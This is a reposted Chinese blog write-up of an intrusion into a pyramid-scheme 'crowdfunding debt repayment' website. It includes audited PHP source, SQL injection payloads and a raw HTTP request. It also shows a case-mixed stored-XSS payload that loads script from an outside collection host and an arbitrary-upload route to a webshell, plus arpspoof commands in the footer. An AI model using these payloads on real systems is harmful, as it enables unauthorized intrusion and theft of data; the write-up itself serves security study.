Kali中文社区:渗透“有钱还“系统

最新推荐文章于 2022-07-22 19:57:26 发布
最新推荐文章于 2022-07-22 19:57:26 发布
阅读量559 收藏 1
点赞数 2
分类专栏: Web安全 渗透测试 文章标签: 渗透测试 web安全 安全 安全漏洞
原文链接:https://www.kali.net.cn/thread/51557
版权

Kali中文社区:渗透"有钱还"系统

0x00 前言

最近通过公安朋友了解到一起传销诈骗案件,涉及的项目叫“有钱还众筹骗局”。

玩法:按照官方的说法,我们注册有钱还这个APP之后,需要支付400元,然后享受众筹还债的权利。比如,你注册了之后,然后拉新三人,这三人每人缴纳400元,则每人可以替你还款200元,即600元。这不是传销么?

123.jpg

0x01 渗透流程简述

访问网站,注册了一个账号如下图:

dZCHk6.png

对网站进行ip查询,服务器为香港阿里云服务器,whois也无可利用信息。

接着对网站目录扫描,发现admin.php文件后台,看到此后台可以看到有钱还管理系统,想法:通过关键词,关键特征搜索此源码,对源码进行代码审计。

dZCHk6.png
紧接着百度搜索引擎搜索"有钱还源码",

dZCHk6.png

在网盘搜找到此套系统源码,对源码代码审计。
dZCHk6.png

123.jpg

0x02 代码审计

sql注入

\system\mod\index\index.mod.php

news_info函数

    public function news_info(){
        if($this->post){
            $n_id = $_POST['n_id'];
            $news = $this->db->query('select * from w_class WHERE id='.$n_id, 2);
            if(!empty($news)){
                $news['n_img'] = $this->setup_img($news['n_img']);
                $news['n_time'] = date('Y-m-d H:i',$news['n_time']);
                echo json_encode(array(
                        'news'=>$news,
                        'code'=>200,
                ));
                exit();
            }else{
                echo json_encode(array('code' => 404, 'msg' => '文章信息不存在'));
                exit();
            }
        }
    }

$n_id 参数传入未过滤,可操控sql查询,数字型盲注

payload:

post
http://www.xxx.cn//?m=index&c=news_info

n_id=123123123 and 1=2

\system\mod\index\plan.mod.php

plan_add函数

    public function plan_add()
    {
        if ($this->post) {
            $fields = $this->SafeFilter($_POST);
            $this->checkuser($fields);
            $uid = $fields['uid'];
            $cash = $this->db->query('select * from w_cash where `c_status`=1 AND c_uid='.$uid, 2);
            if (!empty($cash)) {
                echo json_encode(array('code' => 302, 'msg' => '众筹已激活,不能发起还款计划'));
                exit();
            }
            if ($fields['j_price'] == false) {
                echo json_encode(array('code' => 404, 'msg' => '债务金额无效'));
                exit();
            }
            if (isset($_FILES['j_bor_img'])) {
                $fields['j_bor_img'] = $this->uploads('j_bor_img');
            }
            if ($fields['j_bor_img'] == '') {
                echo json_encode(array('code' => 404, 'msg' => '债务凭证不能为空'));
                exit();
            }
            $jh = array(
                'j_uid' => $uid,
                'j_price' => $fields['j_price'],
                'j_type' => $fields['j_type'],
                'j_bor_img' => $fields['j_bor_img'],
                'j_ctime' => time(),
                'j_status' => 0,
            );
            $is_res = $this->db->insert('w_jihua', $jh);
            if ($is_res) {
                echo json_encode(array('code' => 200, 'msg' => '添加成功'));
                exit();
            } else {
                echo json_encode(array('code' => 302, 'msg' => '添加失败'));
                exit();
            }
        }
    }

SafeFilter函数过滤sql注入,进入函数

addslashes保护给单引号(’)、双引号(")、反斜线(\)与NUL(NULL字符)加上反斜线转义

    public function SafeFilter($arr)
    {
        $ra = Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '/script/', '/javascript/', '/vbscript/', '/expression/', '/applet/', '/meta/', '/xml/', '/blink/', '/link/', '/style/', '/embed/', '/object/', '/frame/', '/layer/', '/title/', '/bgsound/', '/base/', '/onload/', '/onunload/', '/onchange/', '/onsubmit/', '/onreset/', '/onselect/', '/onblur/', '/onfocus/', '/onabort/', '/onkeydown/', '/onkeypress/', '/onkeyup/', '/onclick/', '/ondblclick/', '/onmousedown/', '/onmousemove/', '/onmouseout/', '/onmouseover/', '/onmouseup/', '/onunload/');
        if (is_array($arr)) {
            foreach ($arr as $key => $value) {
                if (!is_array($value)) {
                    if (!get_magic_quotes_gpc()) {
                        $value = addslashes($value);                              //给单引号(')、双引号(")、反斜线(\)与NUL(NULL字符)加上反斜线转义
                    }
                    $value = preg_replace($ra, '', $value);      //删除非打印字符,粗暴式过滤xss可疑字符串
                    $arr[$key] = $value;                                       //去除 HTML 和 PHP 标记并转换为HTML实体
                } else {
                    $this->SafeFilter($arr[$key]);
                }
            }
        }
        return $arr;
    }

uid参数传入为数字型,sql拼接,无需单双引号跳出,存在uid数字型注入

POST /index.php?m=plan&c=plan_add HTTP/1.1
Host: www.xxx.cn
Content-Length: 3899
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywMcI2Era36okhCec
Origin: http://www.xxx.cn
Referer: http://www.xxx.cn/web/zhaiwu.html?id=2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ptre19rkv4o2hmatdft3cqfv77
Connection: close

------WebKitFormBoundarywMcI2Era36okhCec
Content-Disposition: form-data; name="uid"


0 and 1=123
------WebKitFormBoundarywMcI2Era36okhCec
储存型xss

前台审核储存型xss绕过

    public function real_name(){
        if($this->post){
            $fields = $this->SafeFilter($_POST);
            $user   = $this->checkuser($fields);
            $uid    = $fields['uid'];
            if($fields['m_zsxm'] == ''){echo json_encode(array('code' => 404, 'msg' => '真实姓名不能为空'));exit();}
            if($fields['m_carid'] == ''){echo json_encode(array('code' => 404, 'msg' => '身份证号不能为空'));exit();}
            if(isset($_FILES['m_carimg1'])){
                $fields['m_carimg1'] = $this->uploads('m_carimg1');
            }
            if($fields['m_carimg1'] == ''){echo json_encode(array('code' => 404, 'msg' => '请上传身份照片'));exit();}
            if(isset($_FILES['m_carimg2'])){
                $fields['m_carimg2'] = $this->uploads('m_carimg2');
            }
            if($fields['m_carimg2'] == ''){echo json_encode(array('code' => 404, 'msg' => '请上传身份照片'));exit();}
            $set_sm = array(
                'm_zsxm'   => $fields['m_zsxm'],
                'm_carid'  => $fields['m_carid'],
                'm_carimg' => $fields['m_carimg1'].','.$fields['m_carimg2'],
            );
            $is_res = $this->db->update('w_users',$set_sm,array('id'=>$uid));
            if($is_res){
                $this->SetupUser($uid,$fields['m_zsxm']);
                echo json_encode(array('code' => 200, 'msg' => '上传成功,等待审核'));exit();
            }else{
                echo json_encode(array('code' => 302, 'msg' => '上传失败'));exit();
            }
        }
    }

    public function SafeFilter($arr)
    {
        $ra = Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '/script/', '/javascript/', '/vbscript/', '/expression/', '/applet/', '/meta/', '/xml/', '/blink/', '/link/', '/style/', '/embed/', '/object/', '/frame/', '/layer/', '/title/', '/bgsound/', '/base/', '/onload/', '/onunload/', '/onchange/', '/onsubmit/', '/onreset/', '/onselect/', '/onblur/', '/onfocus/', '/onabort/', '/onkeydown/', '/onkeypress/', '/onkeyup/', '/onclick/', '/ondblclick/', '/onmousedown/', '/onmousemove/', '/onmouseout/', '/onmouseover/', '/onmouseup/', '/onunload/');
        if (is_array($arr)) {
            foreach ($arr as $key => $value) {
                if (!is_array($value)) {
                    if (!get_magic_quotes_gpc()) {
                        $value = addslashes($value);                              //给单引号(')、双引号(")、反斜线(\)与NUL(NULL字符)加上反斜线转义
                    }
                    $value = preg_replace($ra, '', $value);      //删除非打印字符,粗暴式过滤xss可疑字符串
                    $arr[$key] = $value;                                       //去除 HTML 和 PHP 标记并转换为HTML实体
                } else {
                    $this->SafeFilter($arr[$key]);
                }
            }
        }
        return $arr;
    }

SafeFilter函数过滤xss,可以看到是字符传入判断,这个大小写绕过就行

因参数过滤不足,在前台身份证认证存在xss漏洞,大小写绕过插入数据库,后台无实体化过滤,从而产生储存型xss

<sCRiPt sRC=//x0.nz/X123></sCrIpT>
rce 前后台任意文件上传getshell

\system\mod\admin\config.mod.php

	public function upload(){
		if($_FILES["file"]["error"]){
			echo json_encode(array('code'=>1,'msg'=>'发生错误'));exit();
		}else{
			if(($_FILES["file"]["type"]=="image/png"||$_FILES["file"]["type"]=="image/jpeg")&&$_FILES["file"]["size"]<1024000){
					$filename =substr(strrchr($_FILES["file"]["name"], '.'), 1);
					$filename ="./static/upload/".date('Ymd',time()).$this->getMillisecond().'.'.$filename;
					if(file_exists($filename)){
						echo json_encode(array('code'=>1,'msg'=>'刷新后重试'));exit();
					}else{  
						move_uploaded_file($_FILES["file"]["tmp_name"],$filename);
						echo json_encode(array('code'=>0,'msg'=>$filename));exit();  
					}  
			}else {
				echo json_encode(array('code'=>1,'msg'=>'类型不允许'));exit();
			}
		}
	}

文件未做身份限制,文件名未做后缀限制,可任意访问,上传文件。

dZCHk6.png

0x04 后续

通过上述审计出的漏洞,获取到服务器权限,并且通过xss落地该团伙位置

落地时间,网站地址,域名,落地ip,端口,落地
2020-05-24 17:12:37,http://xxx.com/admin.php,xxx.com,112.1.2.1,57217,中国 江苏 苏州

该犯罪团伙订单数6万余条

dZCHk6.png

传销2万多用户

dZCHk6.png

难以想象的是,如此拙劣的骗术,为什么还会有这么多人受骗?跟朋友py交易完就开溜,莫贪心。

谢谢观看!

0x05 总结

  1. 渗透测试总获取到网站源码是很关键因素,获取到源码相当于摸清网站所有得结构
  2. 信息收集对渗透测试得重要性,获取到目标越多信息,对渗透测试越有利

阅读原文:https://www.kali.net.cn/thread/51557

superadminuser
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux渗透中文文章汇总合集
04-12
Linux渗透中文文章汇总合集 a-link-to-an-attack.pdf burpsuite.pdf domain-invasion-metasploit.pdf domain-invasion-metasploit域入侵.pdf domain-invasion-of-Keimpx-Hash注入.pdf dump-windows-password-hashes-efficiently.pdf ettercap-filter-rules-send.pdf http-the-https-session-hijacking.pdf http头引发我们的思考.pdf list.txt Metasploit-and-BeEF-the-tutorial中文.pdf metasploit-privilege-escalation.pdf Metasploit渗透测试笔记_v2-土司.pdf mysql-sql-injection-the-remote-the-command-execution.pdf nmap-nse-for-detecting-vulnerable-php-cgi-setups-cve2012-1823.pdf nmap-reports-and-pictures.pdf one-stop-server-metasploit-crack-windows-password.pdf pentes-kioptrix_4.pdf pentest_metasploitable-意淫MSF.pdf powerful-sniffing-tool-ettercap-the-using-the-tutorial-i-deceive-rules.pdf sqlmap-gui-automatic-sql-injection-and-database-takeover-tool.pdf sqlmap-to-bypass-sql-injection-limit.pdf the-install-wordpress-on-linux-the-backtrack-5.pdf the-metasploit-net-horse-to-avoid-killing.pdf use-of-the-an-intranet-hack-port-forwarding.pdf windows-dep-bypass.pdf xssf-inject-with-ettercap-and-arp-poisoningclshack.pdf
还源码--搭建可用,细节自己研究.zip
12-17
搭建过,可用.系统比较完整,具体细节没研究过 搭建过,可用.系统比较完整,具体细节没研究过搭建过,可用.系统比较完整,具体细节没研究过
首款中文渗透测试专用Linux系统—MagicBox
weixin_33850015的博客
08-24 851
1.MagicBox的介绍 首款中文渗透测试专用Linux系统——MagicBox即将问世,中文名称:“魔方系统”,开发代号:Genesis。第一版本发布时间计划为2012年12月5日 这是由NEURON团队下的 magicbox小组开发、维护和更新的一款LinuxliveCD,基于ubuntu 10.04,内核为3.2.6。合并了backtrack和OWAS...
Kali中文社区:java命令执行+waf绕过研究
superadminuser的博客
08-05 917
Kali中文社区:java命令执行+waf绕过研究原因简单说waf绕过常用命令执行函数最后总结一下 原因 今天在项目中,碰到了waf,本着学习研究的原则,刚好最近在学习java,就顺便研究java命令执行的东西。 简单说waf绕过 网上绕过的方法花里胡哨,这里就简单的说一下本人常用的绕过方法。 参数污染,主要是双写参数,或者对参数进行简单的变形,去除双引号等,主要是为了让waf无需检测这一类参数,或者根据操作系统特性,服务器特性进行绕过,这里感觉越来越难绕了就不多少。 垃圾数据填充,这一招能过的还是
全新众筹还款平台系统完整版源码+有还/人人还
egwref的博客
07-22 2622
开发语言PHP系统安装说明建议使用Linux系统+宝塔面板,Linux系统安装宝塔面板教程,可去宝塔官方查看,挺简单的,直接输入一段命令就可以了,具体命令到宝塔官网查看就可以了。服务器环境。......
Kali渗透系统2018.1
06-13
Kali渗透系统,版本是2018.1,经过虚拟机测试,亲测可用。
kali:树莓派上安装kali Linux系统打造便携式渗透组合教程
03-28
在本教程中,我们将深入探讨如何在树莓派上安装Kali Linux系统,以及如何进行初始配置,将这个小巧的设备打造成一个强大的便携式渗透测试工具。Kali Linux是一款基于Debian的开源操作系统,专为网络安全专业人士设计...
kali-tutorial:kali渗透测试教程,Kali渗透测试指南,Kali渗透测试详解
05-12
Kali渗透教程 arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t ...
Kali Linux无线网络渗透kali安装教程
11-06
Kali Linux是一款专为网络安全和渗透测试设计的操作系统,源自著名的BackTrack项目。自2013年BackTrack停更后,Kali Linux继承了其精神,集成了大量渗透测试、网络扫描和攻击工具,确保安全专家能及时获取最新的安全...
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
kali中文指南
08-05
kali中文介绍,适合新手使用。Kali Linux 特性 Kali是BackTrack Linux完全遵循Debian开发标准的完整重建.全新的目录框架、复查并打包所有工具、还为VCS建立了Git 树. 超过300个渗透测试工具: 复查了BackTrack里的每一个工具之后,我们去掉了一部分已经无效或功能重复的工具. 永久免费: Kali Linux一如既往的免费.你永远无需为Kali Linux付费. 开源Git树: 我们是开源软件忠实的拥护者,那些想调整或重建包的人可以浏览我们的开发树得到所有源代码. 遵循FHS: Kali的开发遵循Linux目录结构标准,用户可以方便的找到命令文件、帮助文件、库文件等.. 支持大量无线设备: 我们尽可能的使Kali Linux支持更多的无线设备,能正常运行在各种各样的硬件上,能兼容大量USB和其它无线设备. 集成注入补丁的内核: 作为渗透测试者或开发团队经常需要做无线安全评估.所以我们的内核包含了最新的注入补丁. 安全的开发环境: Kali Linux开发团队由一群可信任的人组成,他们只能在使用多种安全协议的时候提交包或管理源. 包和源有GPG签名: 每个开发者都会在编译和提交Kali的包时对它进行签名,并且源也会对它进行签名. 多语言: 虽然渗透工具趋向于用英语,但我们确保Kali有多语言支持,可以让用户使用本国语言找到他们工作时需要的工具. 完全的可定制: 我们完全理解,不是每个人都赞同我们的设计决定,所以我们让更多有创新精神的用户定制Kali Linux (甚至定制内核)成他们喜欢的样子变得尽可能的容易. ARMEL和ARMHF支持: 自从基于ARM的设备变得越来越普遍和廉价,我们就知道我们该竭尽全力的做好Kali的ARM支持.因此有了现在的ARMEL 和 ARMHF架构的系统.Kali Linux有完整的主线发行版的ARM源,所以ARM版的工具将会和别的版本同时更新.Kali现在可以运行在如下的ARM设备:
kali中文指南.pdf
01-24
该文档适合新手和英文不是很好的用户,主要文档内容为kali常用工具中文使用说明。
Kali Linux中文指南pdf
04-08
Kali Linux中文指南
猪猪侠BuildYourSSRFExploitFramework——一个只影响有人的漏洞.pdf
09-09
wooyun白帽大会-SSRF漏洞自动化利用 wooyun白帽大会-SSRF漏洞自动化利用 wooyun白帽大会-SSRF漏洞自动化利用
kalilinux全工具中文帮助文档
02-13
kalilinux全工具中文帮助文档包括各种工具的中文帮助
kali 中文
空舟的博客
08-05 151
火狐游览器中文 apt -y install firefox-esr-l10n-zh-cn 中文输入法 apt-get install ibus ibus-pinyin
kalilinux工具中文在线
weixin_34363171的博客
02-22 1011
https://www.hackfun.org/kali-tools/kali-tools-zh.html 转载于:https://www.cnblogs.com/itholidaycn/p/6430820.html
学习kali linux的几个不错的网站
热门推荐
董成荣的博客
11-17 3万+
kali 中文网:http://www.kali.org.cn/forum.php?gid=67 Kali官方教材:https://kali.training/ KaliLinux 秘籍:wizardforcel/kali-linux-cookbook-zh - 码云 - 开源中国 Kali Linux Web 渗透秘籍:wizardforcel/kali-linux-web-pentes...
乌云峰会:一场白帽子的盛会
weixin_50464560的博客
07-10 748
白色是最纯粹的颜色,没有一丝杂色,哪怕是掉在上面一粒灰点也能立马呈现,所以白色的世界里不允许有半点污点。   昨天,乌云大会分论坛的最后一个环节讨论了近期发生的一件大事——世纪佳缘事件。 来自中科院软件研究所的研究员丁丽萍、江苏省公安部网络安全专家童瀛、中国互联网协会信用评价中心法律顾问赵占领、知名互联网公司首席安全官陈洋、乌云创始人方小顿、乌云核心白帽子张瑞东、TK教主、安全牛主编李少鹏参与了该环节的讨论。   大家就白帽子以后如何去做测试,如何才能不逾越法律红线进行了激烈的讨论。
精通Kali Linux 高级渗透测试2023版本,英文原版
最新发布
07-12
Kali Linux作为一款强大的开源渗透测试工具,是学习者和专业渗透测试人员的必备资源,它提供了广泛的工具集和攻击模拟环境,以便进行系统评估、漏洞探测和道德黑客活动。 书中内容涵盖了从基础配置到高级技术的全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值